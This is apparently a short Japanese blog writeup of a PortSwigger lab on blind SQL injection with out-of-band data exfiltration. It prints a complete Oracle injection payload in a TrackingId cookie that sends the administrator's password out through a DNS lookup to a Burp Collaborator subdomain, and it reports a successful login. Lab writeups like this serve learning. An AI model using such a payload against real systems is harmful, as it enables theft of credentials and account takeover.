はじめに

「Blind SQL injection with out-of-band data exfiltration」のWriteupです。

portswigger.net

Summary

|| による文字列連結などを使って、データベースから送信されるトラフィックに機密情報を載せる手法です。 前回同様ですが、CookieもURLエンコードが必要とのことで、CyberChefを使ったもののうまくいきませんでした。必要最低限のエンコードに留めなければならないんでしょうか？要確認です。

gchq.github.io

Writeup

今回の目的は、サイトにadministratorとしてログインすることです。

前回と同様の手法でデータベースとCollaboratorの疎通確認をした後、administratorのパスワードを取得するSELECT文を含んだSQLクエリ、を含んだリクエストを送信します。

TrackingId=p2GScen314boOmL7'+UNION+SELECT+extractvalue(xmltype('<%3Fxml+version%3D"1.0"+encoding%3D"UTF-8"%3F><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3A//'||(SELECT+password+FROM+users+WHERE+username+%3d+'administrator')||'.WHAT-YOU-ARE-ISSUED.burpcollaborator.net/">+%25remote%3B]'),'/l')+FROM+dual--+;

すると、Collaboratorのサブドメインにパスワードらしき文字列が含まれています。

ログインできました。